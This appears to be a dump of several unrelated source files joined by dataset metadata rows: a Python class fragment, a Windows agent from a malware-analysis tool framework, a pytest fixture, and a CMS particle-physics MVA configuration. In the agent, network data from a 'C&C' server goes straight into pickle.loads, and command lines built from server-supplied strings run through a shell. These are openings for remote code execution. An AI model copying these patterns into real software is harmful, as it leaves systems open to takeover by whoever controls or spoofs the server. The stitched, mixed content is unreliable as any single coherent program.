class AdvancementRef(Resolvable):
    """Reference to a named advancement, resolved through the scope."""

    def __init__(self, name):
        self.name = name

    def resolve(self, scope):
        return scope.advancement_name(self.name)
| 29.327291 | 86 | 0.588215 | 3,381 | 29,122 | 4.931381 | 0.097013 | 0.046063 | 0.039585 | 0.062676 | 0.325496 | 0.23571 | 0.177652 | 0.148384 | 0.113837 | 0.1046 | 0 | 0.002054 | 0.297816 | 29,122 | 992 | 87 | 29.356855 | 0.813292 | 0.003399 | 0 | 0.282086 | 0 | 0 | 0.03708 | 0.001482 | 0 | 0 | 0 | 0.001008 | 0.096257 | 1 | 0.219251 | false | 0.008021 | 0.002674 | 0.070856 | 0.513369 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
469862e42b088f23b41b49c8734db4c50395bddc | 28,022 | py | Python | agent/windows/agent.py | fortinet/ips-bph-framework | 145e14cced2181f388ade07d78b4f0e9452143dd | [
"Apache-2.0"
] | 21 | 2019-10-24T04:59:52.000Z | 2021-05-11T12:47:17.000Z | agent/windows/agent.py | fortinet/ips-bph-framework | 145e14cced2181f388ade07d78b4f0e9452143dd | [
"Apache-2.0"
] | null | null | null | agent/windows/agent.py | fortinet/ips-bph-framework | 145e14cced2181f388ade07d78b4f0e9452143dd | [
"Apache-2.0"
] | 9 | 2019-10-26T16:56:08.000Z | 2021-03-15T14:10:21.000Z | import shutil
import socket
import subprocess
import threading
import json
import pickle
import tempfile
import time
import box
import threading
import os
import base64
import getpass
import urllib
import requests
import zipfile
import sys
import pprint
import platform
# Verbose tracing of every agent step when True.
DEBUG = True

# Connection endpoints are passed on the command line:
#   agent.py <template_server_ip> <template_server_port> <controller_web_port>
BPH_TEMPLATE_SERVER_IP = sys.argv[1]
BPH_TEMPLATE_SERVER_PORT = int(sys.argv[2])
BPH_CONTROLLER_WEB_PORT = int(sys.argv[3])

# Windows release string, e.g. "7" or "XP"; only those two are supported.
running_os = platform.release()

if running_os == "7":
    # Windows 7 per-user profile locations.
    APP_DATA = "C:\\Users\\{current_user}\\AppData\\Roaming\\".format(
        current_user=getpass.getuser())
    TMP_FOLDER = "C:\\Users\\{current_user}\\AppData\\Local\\Temp\\".format(
        current_user=getpass.getuser())
elif running_os == "XP":
    # To avoid tool issues when dealing with white-spaced paths.
    # (8.3 short names keep the paths whitespace-free on XP.)
    APP_DATA = "C:\\DOCUME~1\\{current_user}\\APPLIC~1\\".format(
        current_user=getpass.getuser())
    TMP_FOLDER = "C:\\DOCUME~1\\{current_user}\\LOCALS~1\\Temp\\".format(
        current_user=getpass.getuser())
else:
    print "Unsupported platform! Exiting..."
    sys.exit()
class FilterSpecialVars():
    """Expands @var@ placeholders in tool parameter/automation strings.

    The substitution table is built from the received template plus the
    module-level path constants; extra user-supplied variables can be
    merged in via custom_user_vars.
    """

    def __init__(self, unfiltered_data, template=None, custom_user_vars=None):
        # unfiltered_data should be a list
        self.unfiltered_data = unfiltered_data
        # Output accumulator, populated by filter_now().
        self.filtered_data = []
        # Placeholder -> replacement mapping. NOTE(review): assumes the
        # template exposes both dict-style and attribute-style access
        # (it is a box.Box on the receiving side).
        self.special_vars = {
            '@appdata@': APP_DATA,  # os.path.expandvars('%appdata%'),
            '@temp@': TMP_FOLDER,
            '@toolname@': template['tool_name'],  # "peid"
            '@filename@': template.tool.filename,  # "peid.exe"
            '@rid@': template['rid'],
            '@md5@': template['md5'],
            # Sample paths are quoted because they may contain whitespace.
            '@sample@': "\"" + ExecutionManager.sample_abs_path + "\"",
            '@sample_filename@': "\"" + os.path.basename(ExecutionManager.sample_abs_path) + "\"",
            '@tool_drive@': template['tool_drive'],
            '@tool_path@': os.path.join(template['tool_drive'], template['remote_tool_path'].replace('/','\\')),
            '@tool_abs_path@': os.path.join(template['tool_drive'], template['remote_tool_path'],
                                            template.tool.filename),
            '@report_folder@': os.path.join(APP_DATA, template['rid'], template['tool_name'])
        }
        if custom_user_vars != None:
            self.custom_user_vars_filter(custom_user_vars)

    def custom_user_vars_filter(self, custom_user_vars):
        """Merges user-defined variables into the substitution table."""
        if DEBUG: print "Custom User Vars Filtering: {}".format(custom_user_vars)
        for k, v in custom_user_vars.items():
            # Wrap the bare key in the @...@ placeholder syntax.
            key = "@{}@".format(k)
            self.special_vars.update({key: v})
        if DEBUG: print self.special_vars

    def filter_now(self):
        """Applies every substitution to every input string in place.

        Results land in self.filtered_data; empty strings are dropped.
        """
        def do_filter(unfiltered_string):
            # Replace each known placeholder occurring in the string.
            for k, v in self.special_vars.items():
                if k in str(unfiltered_string):
                    unfiltered_string = unfiltered_string.replace(k, v)
                    if DEBUG: print ">> Found: {}".format(unfiltered_string)
            return unfiltered_string

        for unfiltered_string in self.unfiltered_data:
            if len(unfiltered_string) != 0:
                if DEBUG: print "### Searching Variable ###: {}".format(unfiltered_string)
                self.filtered_data.append(do_filter(unfiltered_string))
                if DEBUG: print self.special_vars
        if DEBUG:
            print"FILTERED: {}".format(self.filtered_data)
        # return " ".join(self.filtered_data)
class File(object):
def __init__(self):
pass
def generate_random_file_name(self):
import string
import random
return ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(0, 10))
def zip_file(self, file_abs_path, seconds=5):
if not file_abs_path.endswith('.log') and not file_abs_path.endswith('.zip'):
if DEBUG: print "Creating compressed (zip) archive: {}".format(file_abs_path)
#time.sleep(5)
try:
zip_filename = "{}.zip".format(os.path.basename(file_abs_path))
if DEBUG: print zip_filename
original_filename = os.path.basename(file_abs_path)
if DEBUG: print original_filename
path_location = os.path.dirname(file_abs_path)
if DEBUG: print path_location
zip_file_abs_path = "{}\\{}".format(path_location, zip_filename)
if DEBUG: print zip_file_abs_path
zf = zipfile.ZipFile(zip_file_abs_path, 'w', zipfile.ZIP_DEFLATED)
# When a file is bein created as compressed file (zip), in some cases
# the set delay time is not enough and file-access errors appears.
# To avoid such situation, several attempts are made until the access
# to the source file is ready.
try:
zf.write(file_abs_path, os.path.basename(file_abs_path))
except IOError:
if DEBUG: print "Target file is still in use... attempting in ({}) seconds".format(seconds)
time.sleep(seconds)
self.zip_file(file_abs_path)
else:
if DEBUG: print "Zip file creation - Done."
except OSError as e:
if DEBUG: print "Error when setting up info for target zip file: {}".format(e)
raise
else:
zipfile.ZIP_DEFLATED
if os.path.isfile(zip_file_abs_path):
if DEBUG: print "Zip file ok: {}".format(zip_file_abs_path)
# os.remove(file_abs_path)
return zip_filename
else:
if DEBUG: print "Zip file can't be created"
return None
class AutoItScript(File):
    """Materializes automation line data received from the server into an
    AutoIt script file on disk (path exposed as .autoit_script)."""

    def __init__(self, automation_data):
        # Absolute path of the generated script; set by __base64totmp.
        self.autoit_script = None
        self.__base64totmp(automation_data)

    def __base64totmp(self, automation_data):
        """Writes the automation lines to a randomly named file in APP_DATA.

        NOTE(review): despite the name, the input is already decoded here —
        base64 decoding happens in TemplateManager.filter_variables.
        """
        if DEBUG: print "Converting from base64 file data to Auto-it Script"
        tmp_au_script_abs_path = os.path.join(
            APP_DATA, self.generate_random_file_name())
        with open(tmp_au_script_abs_path, 'w+') as tmp_au_script:
            for _ in automation_data:
                if DEBUG: print "Writing: {}\n".format(_)
                tmp_au_script.write(_)
        self.autoit_script = tmp_au_script_abs_path
class DownloadedFile(File):
    """Computes the local landing path (.abs_path) for a downloaded sample."""

    def __init__(self, download_url):
        # Samples always land in the per-user APP_DATA directory.
        self.download_dir = APP_DATA
        # Random alias kept for reference; the real file name is used below.
        self.fake_file_name = self.generate_random_file_name()
        self.original_file_name = os.path.basename(download_url)
        # Extension without the leading dot.
        self.extension = os.path.splitext(download_url)[1].replace('.', '')
        #self.abs_path = os.path.join(self.download_dir, "{}.{}".format(
        #    self.fake_file_name, self.extension))
        self.abs_path = os.path.join(self.download_dir, self.original_file_name)
        if DEBUG:
            print self.abs_path
class ExecutionManager(object):
    """Downloads the sample and runs the requested tool (optionally driven
    by an AutoIt automation script) in a background thread."""

    # Class-level state shared with FilterSpecialVars.
    report_path = ""
    sample_abs_path = ""

    #### Agent Command Control ######
    def execute_tool(self, **cmd_data):
        """Builds the tool command line and runs it (blocking) in a shell."""
        if DEBUG:
            print cmd_data
        tool_drive = cmd_data['tool_drive']
        # Template paths use forward slashes; convert to Windows separators.
        tool_path = cmd_data['tool_path'].replace('/', '\\')
        tool_name = cmd_data['tool_name']
        # Quote the binary path because it may contain whitespace.
        tool_abs_path = "\"{tool_drive}{tool_path}\\{tool_name}\"".format(
            tool_drive=tool_drive,
            tool_path=tool_path,
            tool_name=tool_name,
        )
        if DEBUG:
            print tool_abs_path
        tool_args = cmd_data['tool_args']
        if DEBUG:
            print tool_args
        cmd = "{} {}".format(tool_abs_path, tool_args)
        if DEBUG:
            print cmd
        print "\nExecuting Cmd: {}\n".format(cmd)
        subprocess.call(cmd, shell=True)

    def exec_manager(self, **cmd_data):
        """Runs execute_tool on a named daemonless thread and returns
        immediately; the thread name is used later for liveness checks."""
        if DEBUG:
            if DEBUG: print "\nExecuting Thread with data: {}\n".format(cmd_data)
        thread_name = cmd_data['tool_name']
        thread = threading.Thread(target=self.execute_tool, name=thread_name, kwargs=cmd_data)
        thread.start()

    def write_tmp_file(self, datatowrite, sample_abs_path):
        """Writes the downloaded bytes to disk.

        Returns the path on success, False otherwise.
        NOTE(review): the bare except silently swallows all write errors.
        """
        try:
            if DEBUG: print "Writing Tmp file: {}".format(sample_abs_path)
            with open(sample_abs_path, 'wb+') as f:
                f.write(datatowrite)
        except:
            if DEBUG: print "Error while creating the tmp file."
        else:
            if DEBUG: print "Done."
            if os.path.isfile(sample_abs_path):
                if DEBUG: print "Temp file created correctly."
                # Destination folder is created this way because because
                # some tools shows weird behaviors when passing arguments
                # For instance, CFF Explorer does not work correctly when
                # the file agument resides on a directory with whitespaces.
                # The workaround is to use DOS version of the path.
                #fixed_sample_abs_path = sample_abs_path.split('\\')
                #fixed_sample_abs_path[1] = "docume~1"
                #fixed_sample_abs_path[3] = "applic~1"
                # print fixed_sample_abs_path
                # Setting up Class attribute for sample path
                return sample_abs_path
        return False

    def download_file(self, download_url):
        """Fetches the sample over HTTP and stores it locally.

        Returns the local path on success, False on download failure.
        NOTE(review): if the urllib2 import itself failed, the except
        clause would raise NameError; in practice urllib2 is stdlib (py2).
        """
        if DEBUG: print "Downloading: {}".format(download_url)
        try:
            import urllib2
            filedata = urllib2.urlopen(download_url)
        except urllib2.URLError:
            if DEBUG: print "Can't download the target sample file. Make sure BPH Webserver is running on the host."
            return False
        else:
            datatowrite = filedata.read()
            sample_abs_path = DownloadedFile(download_url).abs_path
            # Used when filtering custom variables
            ExecutionManager.sample_abs_path = sample_abs_path
            if DEBUG: print "Downloaded file: {}".format(sample_abs_path)
            return self.write_tmp_file(datatowrite, sample_abs_path)

    def execute_autoit_script(self, template, auto_it_script_abs_path):
        """Launches the generated script via the bundled AutoIt interpreter."""
        # The previously generated AutoIT script will be executed.
        if DEBUG: print "Executing Auto-It script"
        self.exec_manager(
            tool_drive=template.tool_drive,
            tool_path='misc\\autoitv3\\',
            tool_name='AutoIt3.exe',
            tool_args=auto_it_script_abs_path)

    def tool_execution(self, template):
        """Expands template variables and runs the selected action.

        Supports parameter-only, automation-only and cascaded
        (parameters then automation) execution modes.
        """
        def selected_execution(filtered_parameters, filtered_automation):
            # Cascaded mode: run the tool first, then drive it with AutoIt.
            cascade_execution = False
            if filtered_parameters is not None and filtered_automation is not None:
                if DEBUG: print "Cascaded Execution Detected: parameters -> autoit"
                cascade_execution = True
            if filtered_parameters is not None:
                if DEBUG: print "Parameter Execution Detected"
                self.exec_manager(
                    tool_drive=template.tool_drive,
                    tool_path=template.remote_tool_path,
                    tool_name=template.tool.filename,
                    tool_args=filtered_parameters
                )
            if filtered_automation is not None:
                # If cascase execution is set, then a delay between tool execution
                # and automation is also set. This to allow the tool to properly
                # load and the automation be able to run properly. A default value
                # of 5 seconds was given.
                if cascade_execution:
                    if DEBUG: print "Cascade Execution Delay - Running now..."
                    time.sleep(5)
                if DEBUG: print "Automation-Only Execution Detected"
                custom_user_vars = template.configuration.execution.custom_user_vars
                auto_it_script_abs_path = AutoItScript(filtered_automation).autoit_script
                self.execute_autoit_script(template, auto_it_script_abs_path)

        def filter_custom_vars(template, filter_type=None):
            # Handling template parameters custom vars
            # Returns the filtered string/list, or None when the selected
            # action defines no data of the requested type.
            if filter_type is not None:
                custom_user_vars = template.configuration.execution.custom_user_vars
                if filter_type == "parameters":
                    parameters = template.actions[template.actions.action]['parameters']
                    if parameters is not None:
                        if DEBUG: print "Parameters: {}".format(parameters)
                        if len(custom_user_vars) != 0:
                            if DEBUG: print "Custom Parameters Vars {} - Parameters({})".format(custom_user_vars, parameters)
                            filtered_parameters = self.filter_variables(
                                parameters, template, filter_type='parameters', custom_user_vars=custom_user_vars)
                        else:
                            filtered_parameters = self.filter_variables(
                                parameters, template, filter_type='parameters', custom_user_vars=None)
                        return filtered_parameters
                if filter_type == "automation":
                    automation = template.actions[template.actions.action]['automation']
                    if automation is not None:
                        if DEBUG: print "Automation: {}".format(automation)
                        if len(custom_user_vars) != 0:
                            if DEBUG: print "Custom Automation Vars {}".format(custom_user_vars)
                            filtered_automation = self.filter_variables(
                                automation, template, filter_type='automation', custom_user_vars=custom_user_vars)
                        else:
                            filtered_automation = self.filter_variables(
                                automation, template, filter_type='automation', custom_user_vars=None)
                        return filtered_automation

        action_name = template.actions.action
        if DEBUG: print "Executing: {}".format(action_name)
        filtered_parameters = filter_custom_vars(template, filter_type='parameters')
        filtered_automation = filter_custom_vars(template, filter_type='automation')
        selected_execution(filtered_parameters, filtered_automation)
class TemplateManager(ExecutionManager):
def __init__(self, template):
# self.report_directory_check(template.vm_report_name)
if DEBUG: print "#"*50
if DEBUG: print dict(template)
if DEBUG: print "#"*50
# Each tool request must save files. Those can be either a log file
# or output files from its execution. This "report path" folder will
# be created per request.
#
# The /files/ folder will be used to store any additional files generated
# by the tool.
self.report_path_files = os.path.join(
APP_DATA, template.rid, template.tool_name, 'files')
self.report_path = os.path.join(
APP_DATA, template.rid, template.tool_name)
if not os.path.isdir(self.report_path_files):
if DEBUG: print "Creating: {}".format(self.report_path_files)
os.makedirs(self.report_path_files)
if template.configuration.execution['download_sample']:
self.download_file(template.download_url)
# Tool execution will eventually select which execution type will be run,
# either automated or manual (only based in parameters)
self.tool_execution(template)
# Delay (seconds) between tool executions.
exec_delay = template.configuration.execution.delay
if DEBUG: print "Execution Delay (in seconds): {}".format(exec_delay)
time.sleep(exec_delay)
while True:
if DEBUG: print threading.active_count()
if DEBUG: print threading.enumerate()
threads = str(threading.enumerate()).lower()
if template.configuration.execution.background_run:
if DEBUG: print "TOOL DOES RUN IN BACKGROUND..."
if template.tool.filename.lower() in threads:
# FIXED: This allows more than one tool running in background
if threading.active_count() != 1:
if "autoit" not in threads:
if DEBUG: print "TOOL RUN CHECK DONE"
break
else:
if DEBUG: print "TOOL DOES NOT RUN IN BACKGROUND..."
if template.tool.filename.lower() not in threads:
if "autoit" not in threads:
if DEBUG: print "TOOL RUN CHECK - DONE"
break
time.sleep(1)
if DEBUG: print "\n###### Tool execution has ended #######\n"
if DEBUG: print threading.active_count()
if DEBUG: print threading.enumerate()
if template.configuration.reporting.report_files:
if DEBUG: print "########## Starting COLLECTING HTTP FILES ##############"
self.report(template)
def filter_variables(self, data, template, filter_type=None, custom_user_vars=None):
if filter_type == "parameters":
# Convert into list here.
data = data.split(' ')
if filter_type == "automation":
# Decode first, then convert into a list.
data = base64.decodestring(data).split('\n')
if DEBUG: print "Filtering Variables: {}".format(data)
unfiltered_data = FilterSpecialVars(data, template=template, custom_user_vars=custom_user_vars)
unfiltered_data.filter_now()
if DEBUG: print "Filtered Args: ({})".format(unfiltered_data.filtered_data)
if filter_type == "parameters":
return " ".join(unfiltered_data.filtered_data)
if filter_type == "automation":
return unfiltered_data.filtered_data
def report_back(self, report_data):
url = "http://{}:{}/bph/report.php".format(BPH_TEMPLATE_SERVER_IP, BPH_CONTROLLER_WEB_PORT)
files = {'file': open(report_data['file_abs_path'], 'rb')}
response = requests.post(url, data={'project_name': report_data['project_name'],
'md5': report_data['md5'],
'sid': report_data['sid'],
'tool': report_data['tool_name'],
'rid': report_data['rid'],
'file': report_data['file'],
'dir': report_data['dir']}, files=files)
if DEBUG: print "Response: {}".format(response.text)
def report_files(self, base_folder, tool_name):
if DEBUG: print "Searching files in: {} - tool: {}".format(base_folder, tool_name)
while True:
if len(os.listdir(base_folder)) != 0:
if DEBUG: print "Files found.. Collecting them now..."
files_found = []
for root, dirs, files in os.walk(base_folder):
for file in files:
full_path = os.path.join(root, file)
if DEBUG: print "FullPath: {}".format(full_path)
file_name = os.path.basename(full_path)
if DEBUG: print "FileName: {}".format(file_name)
index = full_path.split('\\').index(tool_name)
if DEBUG: print "Index: {}".format(index)
path_found = "/".join([x for x in full_path.split('\\')[index+1:]])
if DEBUG: print "PathFound: {}".format(path_found)
if path_found.count('/') == 0:
# Tool log file was found (e.g. bintext.log)
if DEBUG: print "Found log file: {}".format(path_found)
if path_found.endswith('.log'):
if DEBUG: print "FullPath: {}".format(full_path)
file_and_path_found = [full_path, path_found, '/']
files_found.append(file_and_path_found)
else:
# Any file inside of the /files/ folder.
if DEBUG: print "Found non-log file: {}".format(path_found)
# For non-log files, a file version of the file will be generated
# due problems of uploading big files through HTTP. This is a temporary fix.
zip_filename = File().zip_file(full_path)
file_and_path_found = zip_filename.split() + \
path_found.split('/')[:-1]
if DEBUG: print file_and_path_found
file_and_path_found.insert(
0, full_path.replace(file_name, zip_filename))
if file_and_path_found not in files_found:
if DEBUG: print "Appending file found: {}".format(file_and_path_found)
files_found.append(file_and_path_found)
if DEBUG: print "FullPathFound: {}".format(file_and_path_found)
if DEBUG: print "Files Found: {}".format(files_found)
return list(files_found)
else:
if DEBUG: print "Waiting for files to appear..."
time.sleep(1)
def report(self, template):
def filter_dir(unfiltered_dir):
if DEBUG: print "Unfiltered dir: {}".format(unfiltered_dir)
dir_path = "/".join(unfiltered_dir)
if dir_path.startswith('/'):
return unfiltered_dir[0]
return "/{}".format(dir_path)
report_data = {}
if os.path.isdir(self.report_path):
if DEBUG: print "Sending back results to C&C server..."
# Request variables. Generate data on the server.
report_data['project_name'] = template.project_name
report_data['md5'] = template.md5
report_data['sid'] = template.sid
report_data['rid'] = template.rid
report_data['tool_name'] = template.tool_name
for file_found in self.report_files(self.report_path,
template.tool_name):
# if DEBUG: print "FileFound: {}".format(file_found)
report_data['file_abs_path'] = file_found[0]
report_data['file'] = urllib.quote(file_found[1], safe='')
report_data['dir'] = filter_dir(file_found[2:])
if DEBUG: print report_data
self.report_back(report_data)
if DEBUG: print "Done."
else:
if DEBUG: print "Report Directory ({}) does not exist".format(self.report_path)
def report_directory_check(self, vm_report_name):
report_path = os.path.join(APP_DATA, vm_report_name)
if DEBUG:
print report_path
if not os.path.isdir(report_path):
os.mkdir(report_path)
self.report_directory_check()
else:
REPORT_PATH = report_path
class Agent:
RETRY_SECS = 1
BUFFER_SIZE = 16384
def __init__(self):
self.connection_status = False
#### Agent Control Functions ####
def start(self):
print "Starting Agent..."
# Connect to Server
self.connect()
def stop(self):
print "Stopping Agent..."
self.disconnect()
self.connection_status = False
def restart(self):
self.stop()
self.start()
#### Agent Connection Functions ####
def check_connection(self):
pass
# print dir(self._clientsocket)
def is_connected(self):
if self.connection_status == True:
return True
return False
def send(self, data):
print "Sending Data: {}".format(data)
try:
self._clientsocket.send(data)
except:
self.reconnect()
def listen(self):
print "Connected to C&C Template Server. Waiting for instructions..."
try:
while True:
# Keeps running receiving data. Once received
# it its automatically un-serialized and converted
# into an Python dictionary object.
serialized_data = pickle.loads(self._clientsocket.recv(self.BUFFER_SIZE))
template_data = box.Box(serialized_data)
# TemplateManager decomposes serialized data
# and take actions to execute the selected program
TemplateManager(template_data)
print "Sending back to C&C => OK status"
self.send('ok')
except socket.error as e:
print "Server disconnection: {}".format(e)
self.reconnect()
except EOFError as e:
print "Server disconnection...".format(e)
self.reconnect()
else:
# If template data was received correctly, then acknowledge.
self.send('skip')
def connect(self):
# Make the connection to the server
print "Connecting to C&C Template Server: {}:{}".format(BPH_TEMPLATE_SERVER_IP, BPH_TEMPLATE_SERVER_PORT)
try:
# Initialize Socket & connect back to server.
self._clientsocket = socket.socket()
self._clientsocket.connect((BPH_TEMPLATE_SERVER_IP, BPH_TEMPLATE_SERVER_PORT))
self._clientsocket.setblocking(1)
except socket.error:
self.reconnect()
except KeyboardInterrupt:
print "Interrupting execution."
sys.exit()
else:
print "Connection established. "
self.connection_status = True
self.listen()
def disconnect(self):
self._clientsocket.close()
def reconnect(self):
print "Reconnecting...."
if DEBUG: print "Connection Error. Server down? Attempting connection in: ({}) seconds".format(self.RETRY_SECS)
time.sleep(self.RETRY_SECS)
if DEBUG: print "Attempting now..."
self.connect()
if __name__ == "__main__":
agent = Agent()
try:
agent.start()
while True:
# agent.check_connection()
if not agent.is_connected():
# If agent stops. Start it again.
agent.start()
except KeyboardInterrupt:
print "Manual interruption. Bye!"
sys.exit()
| 40.552822 | 126 | 0.554386 | 2,993 | 28,022 | 4.972269 | 0.153024 | 0.03904 | 0.06612 | 0.009676 | 0.290149 | 0.211867 | 0.143395 | 0.120817 | 0.096761 | 0.06733 | 0 | 0.003707 | 0.355078 | 28,022 | 690 | 127 | 40.611594 | 0.819776 | 0.1006 | 0 | 0.217759 | 0 | 0 | 0.12152 | 0.010727 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.014799 | 0.046512 | null | null | 0.20296 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
469a1ea0ba86db2759c0a614f1ca8112b547ba08 | 277 | py | Python | app/conftest.py | hbyyy/newsmailing | 53f7bbff438a5dcd19708dc8738d4407d156dd7f | [
"MIT"
] | null | null | null | app/conftest.py | hbyyy/newsmailing | 53f7bbff438a5dcd19708dc8738d4407d156dd7f | [
"MIT"
] | 7 | 2020-06-19T15:32:07.000Z | 2021-08-23T20:49:39.000Z | app/conftest.py | hbyyy/newsmailing | 53f7bbff438a5dcd19708dc8738d4407d156dd7f | [
"MIT"
] | null | null | null | from datetime import timedelta
import pytest
from model_bakery import baker
@pytest.fixture()
def create_expire_user():
def make_user(**kwargs):
user = baker.make('members.User')
user.created -= timedelta(days=4)
return user
return make_user
| 19.785714 | 41 | 0.693141 | 36 | 277 | 5.194444 | 0.555556 | 0.085562 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004608 | 0.216607 | 277 | 13 | 42 | 21.307692 | 0.857143 | 0 | 0 | 0 | 0 | 0 | 0.043321 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0 | 0.3 | 0 | 0.7 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
469d18528989ab40a67eb477eeda37c2533ddfd8 | 5,448 | py | Python | RecoEgamma/ElectronIdentification/python/Identification/mvaElectronID_Fall17_noIso_V1_cff.py | ckamtsikis/cmssw | ea19fe642bb7537cbf58451dcf73aa5fd1b66250 | [
"Apache-2.0"
] | 852 | 2015-01-11T21:03:51.000Z | 2022-03-25T21:14:00.000Z | RecoEgamma/ElectronIdentification/python/Identification/mvaElectronID_Fall17_noIso_V1_cff.py | ckamtsikis/cmssw | ea19fe642bb7537cbf58451dcf73aa5fd1b66250 | [
"Apache-2.0"
] | 30,371 | 2015-01-02T00:14:40.000Z | 2022-03-31T23:26:05.000Z | RecoEgamma/ElectronIdentification/python/Identification/mvaElectronID_Fall17_noIso_V1_cff.py | ckamtsikis/cmssw | ea19fe642bb7537cbf58451dcf73aa5fd1b66250 | [
"Apache-2.0"
] | 3,240 | 2015-01-02T05:53:18.000Z | 2022-03-31T17:24:21.000Z | import FWCore.ParameterSet.Config as cms
from RecoEgamma.ElectronIdentification.Identification.mvaElectronID_tools import *
# Documentation of the MVA
# https://twiki.cern.ch/twiki/bin/viewauth/CMS/MultivariateElectronIdentificationRun2
# https://rembserj.web.cern.ch/rembserj/notes/Electron_MVA_ID_2017_documentation
#
# In this file we define the locations of the MVA weights, cuts on the MVA values
# for specific working points, and configure those cuts in VID
#
# The tag is an extra string attached to the names of the products
# such as ValueMaps that needs to distinguish cases when the same MVA estimator
# class is used with different tuning/weights
mvaTag = "Fall17NoIsoV1"
# There are 6 categories in this MVA. They have to be configured in this strict order
# (cuts and weight files order):
# 0 EB1 (eta<0.8) pt 5-10 GeV | pt < ptSplit && |eta| < ebSplit
# 1 EB2 (eta>=0.8) pt 5-10 GeV | pt < ptSplit && |eta| >= ebSplit && |eta| < ebeeSplit
# 2 EE pt 5-10 GeV | pt < ptSplit && |eta| >= ebeeSplit
# 3 EB1 (eta<0.8) pt 10-inf GeV | pt >= ptSplit && |eta| < ebSplit
# 4 EB2 (eta>=0.8) pt 10-inf GeV | pt >= ptSplit && |eta| >= ebSplit && |eta| < ebeeSplit
# 5 EE pt 10-inf GeV | pt >= ptSplit && |eta| >= ebeeSplit
mvaFall17WeightFiles_V1 = cms.vstring(
"RecoEgamma/ElectronIdentification/data/Fall17/EIDmva_EB1_5_2017_puinfo_BDT.weights.xml.gz",
"RecoEgamma/ElectronIdentification/data/Fall17/EIDmva_EB2_5_2017_puinfo_BDT.weights.xml.gz",
"RecoEgamma/ElectronIdentification/data/Fall17/EIDmva_EE_5_2017_puinfo_BDT.weights.xml.gz",
"RecoEgamma/ElectronIdentification/data/Fall17/EIDmva_EB1_10_2017_puinfo_BDT.weights.xml.gz",
"RecoEgamma/ElectronIdentification/data/Fall17/EIDmva_EB2_10_2017_puinfo_BDT.weights.xml.gz",
"RecoEgamma/ElectronIdentification/data/Fall17/EIDmva_EE_10_2017_puinfo_BDT.weights.xml.gz"
)
## The working point for this MVA that is expected to have about 90% signal
# WP tuned to give about 90 and 80% signal efficiecny for electrons from Drell-Yan with pT > 25 GeV
# The working point for the low pt categories is just taken over from the high pt
idName90 = "mvaEleID-Fall17-noIso-V1-wp90"
MVA_WP90 = EleMVA_WP(
idName = idName90, mvaTag = mvaTag,
cutCategory0 = "0.9165112826974601 - exp(-pt / 2.7381703555094217) * 1.03549199648109", # EB1 low pt
cutCategory1 = "0.8655738322220173 - exp(-pt / 2.4027944652597073) * 0.7975615613282494", # EB2 low pt
cutCategory2 = "-3016.035055227131 - exp(-pt / -52140.61856333602) * -3016.3029387236506", # EE low pt
cutCategory3 = "0.9616542816132922 - exp(-pt / 8.757943837889817) * 3.1390200321591206", # EB1
cutCategory4 = "0.9319258011430132 - exp(-pt / 8.846057432565809) * 3.5985063793347787", # EB2
cutCategory5 = "0.8899260780999244 - exp(-pt / 10.124234115859881) * 4.352791250718547", # EE
)
idName80 = "mvaEleID-Fall17-noIso-V1-wp80"
MVA_WP80 = EleMVA_WP(
idName = idName80, mvaTag = mvaTag,
cutCategory0 = "0.9530240956555949 - exp(-pt / 2.7591425841003647) * 0.4669644718545271", # EB1 low pt
cutCategory1 = "0.9336564763961019 - exp(-pt / 2.709276284272272) * 0.33512286599215946", # EB2 low pt
cutCategory2 = "0.9313133688365339 - exp(-pt / 1.5821934800715558) * 3.8889462619659265", # EE low pt
cutCategory3 = "0.9825268564943458 - exp(-pt / 8.702601455860762) * 1.1974861596609097", # EB1
cutCategory4 = "0.9727509457929913 - exp(-pt / 8.179525631018565) * 1.7111755094657688", # EB2
cutCategory5 = "0.9562619539540145 - exp(-pt / 8.109845366281608) * 3.013927699126942", # EE
)
### WP tuned for HZZ analysis with very high efficiency (about 98%)
# The working points were found by requiring the same signal efficiencies in
# each category as for the Spring 16 HZZ ID
# (see RecoEgamma/ElectronIdentification/python/Identification/mvaElectronID_Spring16_HZZ_V1_cff.py)
idNamewpLoose = "mvaEleID-Fall17-noIso-V1-wpLoose"
MVA_WPLoose = EleMVA_WP(
idName = idNamewpLoose, mvaTag = mvaTag,
cutCategory0 = "-0.13285867293779202", # EB1 low pt
cutCategory1 = "-0.31765300958836074", # EB2 low pt
cutCategory2 = "-0.0799205914718861" , # EE low pt
cutCategory3 = "-0.856871961305474" , # EB1
cutCategory4 = "-0.8107642141584835" , # EB2
cutCategory5 = "-0.7179265933023059" # EE
)
#
# Finally, set up VID configuration for all cuts
#
# Create the PSet that will be fed to the MVA value map producer
mvaEleID_Fall17_noIso_V1_producer_config = cms.PSet(
mvaName = cms.string(mvaClassName),
mvaTag = cms.string(mvaTag),
# Category parameters
nCategories = cms.int32(6),
categoryCuts = cms.vstring(*EleMVA_6CategoriesCuts),
# Weight files and variable definitions
weightFileNames = mvaFall17WeightFiles_V1,
variableDefinition = cms.string("RecoEgamma/ElectronIdentification/data/ElectronMVAEstimatorRun2Fall17V1Variables.txt")
)
# Create the VPset's for VID cuts
mvaEleID_Fall17_V1_wpLoose = configureVIDMVAEleID( MVA_WPLoose )
mvaEleID_Fall17_V1_wp90 = configureVIDMVAEleID( MVA_WP90 )
